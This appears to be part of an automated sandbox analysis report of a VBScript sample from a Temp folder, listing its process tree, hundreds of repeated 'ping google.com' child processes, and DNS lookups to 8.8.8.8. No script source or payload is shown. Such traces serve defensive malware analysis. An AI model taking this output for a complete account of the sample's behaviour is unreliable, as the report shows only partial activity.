PID 560 wrote to memory of 524 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3580 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3580 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 1352 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 1352 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 4944 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 4944 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 2816 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 2816 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 2724 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 2724 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 4656 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 4656 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3308 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 3308 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 4920 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 4920 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 1056 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe
PID 560 wrote to memory of 1056 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\ping.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1288891badfcf62c7ea6322572451016a77cec9407c5e31ad5f6d3563a353859.vbs"

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4092,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=3976 /prefetch:8

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

C:\Windows\System32\ping.exe

ping google.com -n 1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp

Files

N/A